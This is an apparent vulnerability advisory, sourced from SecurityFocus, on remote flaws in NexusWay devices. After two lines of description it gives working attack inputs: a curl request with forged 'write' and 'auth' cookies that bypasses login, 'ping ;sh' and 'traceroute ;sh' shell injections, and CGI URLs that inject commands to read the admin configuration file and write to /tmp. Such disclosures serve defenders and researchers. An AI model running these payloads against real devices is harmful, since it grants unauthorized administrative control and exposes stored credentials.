14 lines
No EOL
616 B
Text
14 lines
No EOL
616 B
Text
source: https://www.securityfocus.com/bid/13596/info
|
|
|
|
NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device.
|
|
|
|
All versions of NexusWay are considered vulnerable at the moment.
|
|
|
|
# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;
|
|
client_ip1;client=0.0.0.0' https://www.example.com/index.cgi
|
|
|
|
ping ;sh
|
|
traceroute ;sh
|
|
|
|
https://www.example.com/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
|
|
https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test |